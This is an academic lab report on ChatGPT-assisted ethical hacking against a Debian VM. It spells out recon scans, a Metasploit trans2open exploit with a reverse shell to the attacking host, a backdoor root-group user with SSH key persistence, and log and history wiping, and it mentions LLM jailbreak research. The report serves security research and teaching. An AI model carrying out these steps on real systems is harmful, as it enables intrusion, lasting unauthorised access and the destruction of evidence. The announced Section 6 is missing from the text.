AI-Enhanced Ethical Hacking: A Linux-Focused Experiment
1 Introduction
Generative AI (GenAI) can support ethical hackers at various stages of the process. Tools like ChatGPT [5] allow ethical hackers
to streamline repetitive tasks, make faster decisions, and reduce the extensive
human input typically required. This not only addresses the time and capacity
limitations faced by operators but also lowers the implementation costs. GenAI’s
ability to analyse data, provide real-time insights, and optimise workflows leads
to more efficient, cost-effective security assessments.
This report presents a comprehensive experimental study evaluating the prac-
tical use of GenAI in a controlled Linux-based virtual environment. By simu-
lating key stages of ethical hacking, such as reconnaissance, scanning, gaining
& maintaining access, and covering tracks, this study demonstrates how GenAI
can enhance these processes and bolster cybersecurity defences. The findings
and observations documented here contribute to the ongoing discussion about
AI-human collaboration in cybersecurity, emphasising the potential of GenAI
to improve efficiency and reduce costs while maintaining the need for expert
oversight.
While previous research has explored the broader role of GenAI in cyberse-
curity, this report specifically examines its application in Linux-based environ-
ments, which are frequently targeted in both penetration testing and real-world
attacks. This work builds on our previously published research, in which we
proposed a conceptual model leveraging the capabilities of GenAI to support
ethical hackers across the five stages of ethical hacking [3]. It also expands on a
proof-of-concept implementation, used to conduct an initial experimental study
on the integration of AI into ethical hacking on target Windows VMs [2].
The remainder of this document is organised as follows. Section 2 explores
GenAI and ChatGPT. Section 3 presents the laboratory setup, and section 4
outlines our methodology. Section 5 details the execution of our experiment.
Section 6 discusses the potential benefits and risks. Section 7 reviews related
work, and section 8 summarises our conclusions and outlines plans for future
work. Finally, appendix A lists all the figures referenced in this technical report.
2 GenAI and ChatGPT
ChatGPT is built on large language models trained on vast text corpora, capturing
not just the structure of language but also its context, essential for generating
human-like text.
Each iteration of ChatGPT has demonstrated enhanced contextual under-
standing and output relevance. Its primary function lies in interpreting user
prompts and generating coherent, contextually appropriate responses. This ver-
satility extends from conducting conversations to performing complex tasks, in-
cluding coding, content creation, and, as we propose in this report, ethical hack-
ing. The GPT model family, including ChatGPT, owes much of its success to the
transformer model, introduced by Vaswani et al. in 2017 [15]. This architecture
revolutionises sequence processing through attention mechanisms, enabling the
model to focus on different parts of the input based on its relevance to the task.
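For reference, the scaled dot-product attention at the core of this architecture is computed as

    Attention(Q, K, V) = softmax(QK^T / sqrt(d_k)) V,

where Q, K, and V are the query, key, and value matrices and d_k is the key dimension [15].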
The latest iteration, GPT-4o (https://openai.com/blog/chatgpt), provides significant advances in speed, multi-
modal capabilities, and overall intelligence. GPT-4o, now available to a broader
user base, including free-tier users, improves upon the GPT-4 model by offering
enhanced performance in understanding and generating text, as well as new ca-
pabilities in processing voice and images. These improvements position GPT-4o
as a powerful tool not only in natural language processing but also in applica-
tions such as real-time communication and data analysis, making it a key asset
in modern cybersecurity practices.
In exploring the intersection of AI and cybersecurity, understanding Chat-
GPT’s foundational aspects is vital. Its generative nature, contextual sensitivity,
and adaptive learning capacity can lead to innovative approaches in cybersecu-
rity practices. Our focus will be on how these qualities of ChatGPT can be
used to support ethical hacking, exploring the technical, ethical, and practical
implications.
3 Laboratory Setup
The experiments used a MacBook Pro with 16 GB RAM, a 2.8 GHz Quad-Core
Intel Core i7 processor, and 1 TB of storage, providing sufficient computational
capabilities for virtualisation (see Figs. 1 and 2).
Virtualisation of the network was achieved using VirtualBox 7 (see Fig. 3),
a reliable tool for creating and managing virtual machine environments. The
virtual setup included the following VMs.
1. Kali Linux VM: this machine functioned as the primary attack platform
for conducting the penetration tests. It is equipped with the necessary tools
and applications for ethical hacking.
2. Windows VM: this machine, running a 64-bit version of Windows Vista
with a memory allocation of 512 MB, was the principal target for penetration
testing within a previously conducted experiment [2].
3. Linux VM: this machine, operating on a 64-bit Linux Debian system and
allocated 512 MB of memory, is the primary focus of this report.
The experiment leveraged ChatGPT-4 (a paid version) for its advanced AI ca-
pabilities and efficient response time. The selection of ChatGPT-4 was also based
on its prominent status as a leading GenAI tool, offering cutting-edge technology
to enhance the ethical hacking process. Of course, other GenAI tools are also
available, e.g. Google's Bard and GitHub's Copilot, which could potentially
be used in similar contexts. The methodologies and processes described are ap-
plicable to both the paid and free versions of ChatGPT, with the paid version
chosen for improved performance in this study.
4 Methodology
The experiment followed the five structured phases of ethical hacking, namely
reconnaissance, scanning, gaining access, maintaining access, and covering
tracks, with ChatGPT's guidance integrated at each step.
5 Execution
We now summarise the experimental procedure for each stage.
5.1 Reconnaissance
There are two main types of reconnaissance (recon).
1. Passive Recon: This entails observing the target without any active engage-
ment.
2. Active Recon: Active recon involves engaging with the target to prompt
responses for observation.
The emphasis here is on active reconnaissance; we followed the steps listed
below (a consolidated command sketch follows the list).
1. We began by asking ChatGPT to recommend commands for identifying the
active devices within the target network (see Fig. 8).
2. ChatGPT recommended suitable host-discovery commands, notably the
'arp-scan' tool.
3. We next turned to the Kali 'attack' machine, applying the ChatGPT
recommendations. As a result, we successfully identified the active devices
within the target network, as in Fig. 9.
4. To determine the IP address of the Kali ‘attack’ machine, we used the ‘host-
name’ command with the ‘-I’ option, as shown in Fig. 10.
5. To find potential target machines, the IP addresses of the Kali host, the
standard default gateway, and the DHCP server can be excluded. To sim-
plify this process and avoid the need to remember the relevant commands,
ChatGPT can be consulted for guidance. We first asked ChatGPT for the
commands to display the IP addresses of our Kali machine, the standard
default gateway, and the DHCP server, as shown in Fig. 11. We executed
these commands, as displayed in Fig. 12. We next asked ChatGPT to analyse
the output from the ‘arp-scan’ command, which lists active network nodes,
and the output of the commands displaying the default IP addresses, in order
to identify the role of each IP address, such as Kali machine, DHCP server,
etc. ChatGPT performed this analysis and provided responses in a question-
and-answer format, as shown in Figs. 13 and 14.
6. As a result of the analysis presented above, we identified the VMs with the
IP addresses 192.168.1.6 and 192.168.1.7 as potential targets. This allowed
us to proceed to the second scanning stage.
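For concreteness, a minimal sketch of the host-discovery sequence described in the steps above is given below; the DHCP lease-file path is an assumption and may differ between systems.

    sudo arp-scan --localnet     # enumerate active devices via ARP (Fig. 9)
    hostname -I                  # IP address(es) of the Kali machine (Fig. 10)
    ip route show default        # default gateway
    grep dhcp-server-identifier /var/lib/dhcp/dhclient.leases  # DHCP server (path assumed)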
5.2 Scanning
During this stage, ethical hackers typically use automated tools to scan a target
system or network for vulnerabilities. This can include port scanning, vulner-
ability scanning, etc. In our specific scenario, the system to be scanned is the
Linux machine with IP address '192.168.1.7'.
To initiate this phase, we asked ChatGPT for key commands for gather-
ing comprehensive information about the specific target (192.168.1.7) using our
Kali machine. We informed ChatGPT that the goal was to gather extensive
intelligence on this system in preparation for an attack. As shown in Fig. 15,
ChatGPT provided a concise list of potential scanning commands, including the
use of nmap and its various capabilities. Interestingly, this output is significantly
more comprehensive than that which ChatGPT produced a year previously when
we asked a similar question for a different VM (Windows) [2], demonstrating the
model’s improvement over time.
We further engaged with ChatGPT, requesting a single ‘nmap’ command
that could gather as much information as possible about the target (192.168.1.7),
including scanning all ports and saving the output in all supported ‘nmap’ for-
mats. ChatGPT correctly recommended the command ‘nmap -p- -A -T4 -oA
scan_results 192.168.1.7', providing a detailed breakdown of the command's op-
tions, as illustrated in Fig. 16. The options in this ‘nmap’ command have the
following effects:
– -p-: scans all 65,535 TCP ports, rather than only the most common ones;
– -A: enables OS detection, version detection, script scanning, and traceroute;
– -T4: sets the timing template to 'Aggressive' for faster scanning; and
– -oA scan_results: saves the output in all three major 'nmap' formats
(.nmap, .xml, and .gnmap) with the base name 'scan_results'.
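Putting this together, the scan can be run and its results reviewed as follows (a sketch; the output file names follow from the -oA base name):

    # Full-port, aggressive scan of the target, saved in all three nmap formats
    nmap -p- -A -T4 -oA scan_results 192.168.1.7
    # Review the human-readable results
    less scan_results.nmap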
5.3 Gaining Access
In this phase, we sought guidance from ChatGPT to gain access to the Linux VM
with the IP address ‘192.168.1.7’ using our Kali attack machine. To streamline
the process, we decided to exploit an SMB-related vulnerability via Metasploit.
The ‘nmap’ scan revealed that the target machine supports SMB version 2,
which is outdated and known to have vulnerabilities. ChatGPT provided a de-
tailed guide on how to use Metasploit to confirm the SMB version, as shown in
Fig. 18, which we followed. We started Metasploit with the command ‘msfcon-
sole', selected the 'auxiliary/scanner/smb/smb_version' module, set the target
IP with ‘set RHOSTS 192.168.1.7’, and executed the module with ‘run’. The
Metasploit output confirmed the ‘nmap’ results, indicating that our target in-
deed supports SMB version 2, as shown in Fig. 19.
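The corresponding Metasploit console session, reconstructed from the steps just described, looks like this:

    msfconsole
    # inside msfconsole:
    use auxiliary/scanner/smb/smb_version
    set RHOSTS 192.168.1.7
    run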
Following this confirmation, we asked ChatGPT which vulnerability pos-
sessed by Metasploit could be exploited to gain access. As shown in Figs. 20
and 21, ChatGPT recommended the use of the “Samba ‘trans2open’ overflow”
exploit in Metasploit, which is specifically designed to target older versions of
Samba, such as 2.2.1a. ChatGPT also provided step-by-step instructions on how
to exploit this vulnerability using Metasploit.
As shown in Fig. 22, we followed ChatGPT’s instructions to exploit the well-
known trans2open vulnerability. However, when we attempted to run the exploit,
we encountered an error since the payload suggested by ChatGPT was incom-
patible. This demonstrates that, while ChatGPT is a powerful tool, it is not
infallible and can make mistakes. We presented the error directly to ChatGPT
without specifically requesting a solution, and ChatGPT promptly suggested a
fix (see Fig. 24). We applied the suggested fix, as shown in Fig. 23, and success-
fully gained root access to the target Linux machine (see Fig. 25).
To summarise, in order to gain access to the target machine (192.168.1.7) us-
ing the ‘trans2open’ exploit via Metasploit, we started Metasploit with ‘msfcon-
sole’, selected the exploit module with ‘use exploit/linux/samba/trans2open’, set
the payload with 'set payload linux/x86/shell/reverse_tcp', configured the target
IP with ‘set RHOSTS 192.168.1.7’, set the ‘LHOST’ to the attacking machine’s
IP (192.168.1.4), accepted the default ‘LPORT’ of 4444, and then ran the exploit
with ‘run’.
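For clarity, the full exploit session, reconstructed from the summary above, is sketched below.

    msfconsole
    # inside msfconsole:
    use exploit/linux/samba/trans2open
    set payload linux/x86/shell/reverse_tcp   # payload used after applying ChatGPT's fix
    set RHOSTS 192.168.1.7                    # target Linux VM
    set LHOST 192.168.1.4                     # Kali attack machine
    set LPORT 4444                            # default listener port
    run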
5.4 Maintaining Access
Creating a New User. As shown in Fig. 31, we first created a new root
user employing the command ‘useradd -m -s /bin/bash -G root Haitham’.
This command creates a new user named ‘Haitham’, sets up a home directory
at /home/Haitham with the -m option, assigns /bin/bash as the default shell
with the -s option, and includes the user in the root group with the -G op-
tion, thereby granting elevated permissions (see Fig. 35). We further used the
command ‘passwd Haitham’ to set up a new password for the newly added
user (see Fig. 33 and Fig. 34). We verified that the user was indeed added by
checking for a new entry in both the /etc/passwd and /etc/shadow files. We
also confirmed that the user was added to the root group using the command
‘groups Haitham’, and by also reviewing the /etc/sudoers file (see Fig. 36).
Subsequently, we tested this by restarting the Linux target machine and success-
fully confirmed our ability to log in using the newly created user through the
standard Linux login procedure.
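The command sequence for this step, as described above, is sketched below; the verification commands shown are one way of performing the checks described, and exact usage may vary.

    # Create the user with a home directory, bash shell, and root group membership
    useradd -m -s /bin/bash -G root Haitham
    # Set a password for the new user
    passwd Haitham
    # Verify the new entries and group membership
    grep Haitham /etc/passwd /etc/shadow
    groups Haitham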
Since port 22 is open, we established an SSH session using the newly added
user credentials (see Fig. 37), which provided a more stable shell with double-tab
auto-completion and history features enabled by default. This SSH session can
also be made password-less by setting up SSH public-key authentication, for
which we followed the steps below (consolidated in the sketch after this list).
1. We first generated an SSH key pair on the Kali machine using ‘ssh-keygen
-t rsa -b 4096’.
2. We next copied the public key to the target machine by executing the com-
mand ‘ssh-copy-id [email protected]’ on our Kali machine.
3. We enabled SSH public-key, password-less authentication on the target ma-
chine by adding 'PubkeyAuthentication yes' to the '/etc/ssh/sshd_config'
file, and then restarted the SSH service with ‘sudo systemctl restart
sshd’.
4. We also ensured correct file permissions on the target machine with the com-
mands: 'chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys'.
5. Finally, we tested the connection from the Kali machine using the command:
‘ssh [email protected]’.
5.5 Covering Tracks
We then asked ChatGPT how to remove traces of our activity from the target
machine; its recommendations included the actions below (consolidated into a
single sketch after this list).
– Clear Command History: Clear the current session's history and remove
the history file using 'history -c && history -w' and 'rm ~/.bash_history'.
– Disable Future History Logging: Disable history logging for the session
with ‘unset HISTFILE’, ‘export HISTSIZE=0’, and ‘export HISTFILESIZE=0’.
– Remove Log Entries: Empty critical log files without deleting them using
‘echo > /var/log/auth.log’, ‘echo > /var/log/syslog’, and ‘echo >
/var/log/secure’.
– Clean SSH Artifacts: Remove the SSH key and check SSH logs for the
hacking activities using 'rm ~/.ssh/authorized_keys' and 'sudo nano
/var/log/auth.log’.
– Delete Temporary Files: Remove temporary files that could reveal the
pen-test activities using ‘rm -rf /tmp/*’ and ‘rm -rf /var/tmp/*’.
– Remove ‘Haitham’ User: Delete the ‘Haitham’ user and the correspond-
ing home directory using ‘userdel -r Haitham’.
– Clear Scheduled Tasks: Remove all cron jobs for the current user with
‘crontab -r’.
– Flush ARP Cache: Clear the ARP cache to remove traces in the network
using ‘ip -s -s neigh flush all’.
– Reset Terminal and Exit: Clear the terminal screen and exit the shell
cleanly using ‘reset’ and ‘exit’.
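The commands above can be collected into a single cleanup sketch (one possible consolidation, run as root on the target; as noted below, wholesale log clearing can itself raise suspicion):

    history -c && history -w                  # clear in-memory and saved history
    rm ~/.bash_history                        # remove the history file
    unset HISTFILE; export HISTSIZE=0 HISTFILESIZE=0  # stop history logging
    echo > /var/log/auth.log                  # empty key logs without deleting them
    echo > /var/log/syslog
    echo > /var/log/secure                    # present on RHEL-style systems
    rm ~/.ssh/authorized_keys                 # remove the planted SSH key
    rm -rf /tmp/* /var/tmp/*                  # delete temporary files
    userdel -r Haitham                        # remove the added user and home directory
    crontab -r                                # clear the current user's cron jobs
    ip -s -s neigh flush all                  # flush the ARP cache
    reset && exit                             # reset terminal and leave cleanly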
Using shred for Secure File Deletion. In response to our question (see
Figs. 45 and 46), ChatGPT explained that shred is a command-line utility in
Linux used to securely delete files by overwriting their contents with random
data multiple times, making it extremely difficult to recover the original data.
The command 'shred -uvfz -n 5 old_authorized_keys' operates as follows:
– -n 5: overwrites the file five times with random data;
– -u: deallocates and removes the file after overwriting;
– -v: shows progress;
– -f: forces the operation by changing permissions if necessary; and
– -z: adds a final overwrite with zeros to hide the shredding.
In this example, the command securely deletes the file old_authorized_keys
by overwriting it five times with random data, adding a final overwrite with
zeros, showing progress, forcing the operation even if the file is read-only, and
then deleting the file.
Finally, while we implemented some of these recommendations, it is worth
noting ChatGPT’s advice that clearing logs can raise suspicion in real-world
scenarios and might not always be advisable.
7 Related Work
The intersection of AI and cybersecurity is a highly active area of research, with
studies ranging from AI’s role in detecting intrusions to aiding in offensive se-
curity including ethical hacking. The rise of sophisticated language models like
GPT-3, introduced by Brown et al. [5], has expanded research possibilities by en-
abling strong performance on various tasks, including, as we show in this report,
cybersecurity. Handa et al. [9] review the application of machine learning
in cybersecurity, emphasizing its role in areas like zero-day malware detection
and anomaly-based intrusion detection, while also addressing the challenge of
adversarial attacks on these algorithms. Other studies, including that by Gupta
et al. [8], examine the dual role of GenAI models like ChatGPT in cybersecurity
and privacy, highlighting both their potential for malicious use in attacks such
as social engineering and automated hacking, and their application in enhancing
cyber defense measures.
Moreover, Large Language Models (LLMs), a form of GenAI, are being ap-
plied across various domains, including cybersecurity. For example, they are
used to fix vulnerable code [13] and identify the root causes of incidents in cloud
environments [1]. In addition, various LLM-based tools have been recently de-
veloped, such as Code Insight (https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.html)
by VirusTotal, which analyses and explains the functionality of malware written
in PowerShell. Furthermore, tools for vulnerability scanning (https://github.com/aress31/burpgpt)
and penetration testing (https://github.com/GreyDGL/PentestGPT) [6] have
also emerged lately.
A recent practical study by Harrison et al. [10] shows how advances in AI’s
deep learning algorithms can be used to enhance acoustic side-channel attacks
against keyboards, achieving impressive keystroke classification accuracy via
common devices like smartphones and Zoom. This development poses a sig-
nificant threat, potentially enabling the theft of sensitive information such as
passwords and PINs from devices without needing physical access to the vic-
tim's machine. A recent panel discussion [4] also highlighted the dual role of
AI in enhancing cybersecurity while addressing the rising threat of adversarial
attacks that exploit AI system vulnerabilities.
Recent research has also identified new vulnerabilities in the security mech-
anisms of LLMs. Jiang et al. [11] introduced ‘ArtPrompt’, an innovative ASCII
art-based jailbreak attack that exploits the inability of LLMs to recognise
prompts encoded in ASCII art. This work underscores the need for further
research into the robustness of AI models, particularly as these vulnerabilities
can bypass safety measures and induce undesired behaviors in state-of-the-art
LLMs such as GPT-4 and Claude.
Park et al. [12] introduce a technique for automating the reproduction of 1-
day vulnerabilities using LLMs. Their approach involves a three-stage prompting
system, guiding LLMs through vulnerability analysis, identifying relevant in-
put fields, and generating bug-triggering inputs for use in directed fuzzing. The
method, tested on real-world programs, showed some improvements in fuzzing
performance compared to traditional methods. This research demonstrates the
potential of LLMs to enhance cybersecurity processes, particularly in automating
complex tasks such as vulnerability reproduction.
Fujii and Yamagishi [7] explore the use of LLMs to support static malware
analysis, demonstrating that LLMs can achieve practical accuracy. A user study
was conducted to assess their utility and identify areas for future improvement.
Our experimental research work seeks to expand on these discussions, explor-
ing ChatGPT’s role across all stages of ethical hacking — a topic that remains
under-explored in the existing literature. We aim to provide a comprehensive
framework for integrating generative language models into ethical hacking, evi-
dencing AI’s multifaceted role in cybersecurity. We have also sought to empiri-
cally validate claims and assertions regarding the capabilities of ChatGPT in the
ethical hacking domain through a series of controlled, research-driven, lab-based
experiments.
References
1. Ahmed, T., Ghosh, S., Bansal, C., Zimmermann, T., Zhang, X., Rajmohan, S.:
Recommending root-cause and mitigation steps for cloud incidents using large
language models. In: Proceedings of 2023 IEEE/ACM 45th International Con-
ference on Software Engineering (ICSE). pp. 1737–1749. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10172904/
2. Al-Sinani, H., Mitchell, C.: Unleashing AI in ethical hacking: A prelimi-
nary experimental study. Technical report, Royal Holloway, University of Lon-
don (2024), https://pure.royalholloway.ac.uk/files/58692091/TechReport_
UnleashingAIinEthicalHacking.pdf
3. Al-Sinani, H.S., Mitchell, C.J., Sahli, N., Al-Siyabi, M.: Unleashing AI in ethical
hacking. In: Proceedings of the STM 2024, the 20th International Workshop on
Security and Trust Management (co-located with ESORICS 2024), Bydgoszcz,
Poland. p. to appear. LNCS, Springer (2024), https://www.chrismitchell.net/
Papers/uaieh.pdf
4. Bertino, E., Kantarcioglu, M., Akcora, C.G., Samtani, S., Mittal, S., Gupta,
M.: AI for security and security for AI. In: Joshi, A., Carminati, B., Verma,
R.M. (eds.) CODASPY ’21: Eleventh ACM Conference on Data and Applica-
tion Security and Privacy, Virtual Event, USA, April 26–28, 2021. pp. 333–
334. ACM (2021). https://doi.org/10.1145/3422337.3450357, https://doi.
org/10.1145/3422337.3450357
5. Brown, T.B., et al.: Language models are few-shot learners. In: Larochelle,
H., Ranzato, M., Hadsell, R., Balcan, M., Lin, H. (eds.) Advances in
Neural Information Processing Systems 33: Annual Conference on Neu-
ral Information Processing Systems 2020, NeurIPS 2020, December 6–
12, 2020, virtual (2020), https://proceedings.neurips.cc/paper/2020/hash/
1457c0d6bfcb4967418bfb8ac142f64a-Abstract.html
6. Deng, G., Liu, Y., Mayoral-Vilches, V., Liu, P., Li, Y., Xu, Y., Zhang, T., Liu, Y.,
Pinzger, M., Rass, S.: PentestGPT: An LLM-empowered automatic penetration
testing tool (2023), https://arxiv.org/abs/2308.06782
7. Fujii, S., Yamagishi, R.: Feasibility study for supporting static malware analy-
sis using LLM. In: Proceedings of the SecAI 2024, the Workshop on Security
and Artificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland.
p. to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14EW8RJnE4QUBG0mIoMVM0chzJcp1nQon/view
8. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From ChatGPT to
ThreatGPT: Impact of generative AI in cybersecurity and privacy. IEEE Ac-
cess 11, 80218–80245 (2023). https://doi.org/10.1109/ACCESS.2023.3300381,
https://doi.org/10.1109/ACCESS.2023.3300381
9. Handa, A., Sharma, A., Shukla, S.K.: Machine learning in cybersecurity: A review.
WIREs Data Mining and Knowledge Discovery 9(4), e1306 (2019). https://doi.
org/10.1002/WIDM.1306, https://doi.org/10.1002/widm.1306
10. Harrison, J., Toreini, E., Mehrnezhad, M.: A practical deep learning-based acoustic
side channel attack on keyboards. In: IEEE European Symposium on Security and
Privacy, EuroS&P 2023 — Workshops, Delft, Netherlands, July 3-7, 2023. pp. 270–
280. IEEE (2023). https://doi.org/10.1109/EUROSPW59978.2023.00034, https:
//doi.org/10.1109/EuroSPW59978.2023.00034
11. Jiang, F., Xu, Z., Niu, L., Xiang, Z., Ramasubramanian, B., Li, B., Poovendran,
R.: ArtPrompt: ASCII art-based jailbreak attacks against aligned LLMs. Tech.
rep. (2024). https://doi.org/10.48550/ARXIV.2402.11753, https://doi.org/
10.48550/arXiv.2402.11753
12. Park, S., Lee, H., Cha, S.K.: Systematic bug reproduction with large language
model. In: Proceedings of the SecAI 2024, the Workshop on Security and Ar-
tificial Intelligence (co-located with ESORICS 2024), Bydgoszcz, Poland. p.
to appear. LNCS series, Springer (2024), https://drive.google.com/file/d/
14dafpfhAnp9YLb9YIC4YbVJKwTPc_dQ3/view
13. Pearce, H., Tan, B., Ahmad, B., Karri, R., Dolan-Gavitt, B.: Examining zero-shot
vulnerability repair with large language models. In: Proceedings of 2023 IEEE
Symposium on Security and Privacy (SP). pp. 2339–2356. IEEE (2023), https:
//ieeexplore.ieee.org/abstract/document/10179324
14. Swanson, M., Bartol, N., Sabato, J., Hash, J., Graffo, L.: Technical guide to
information security testing and assessment (NIST SP 800-115). Special Publi-
cation 800-115, National Institute of Standards and Technology (2008), https:
//csrc.nist.gov/publications/detail/sp/800-115/final
15. Vaswani, A., Shazeer, N., Parmar, N., Uszkoreit, J., Jones, L., Gomez, A.N., Kaiser,
L., Polosukhin, I.: Attention is all you need. In: Guyon, I., von Luxburg, U.,
Bengio, S., Wallach, H.M., Fergus, R., Vishwanathan, S.V.N., Garnett, R. (eds.)
Advances in Neural Information Processing Systems 30: Annual Conference on
Neural Information Processing Systems 2017, December 4–9, 2017, Long Beach,
CA, USA. pp. 5998–6008 (2017)
A Appendix
Fig. 8. Reconnaissance
Fig. 11. Requesting ChatGPT to suggest commands for displaying default IP addresses
Fig. 40. Corrected ChatGPT response for enabling public key authentication
Fig. 49. Request to ChatGPT for a PenTest report draft based on provided details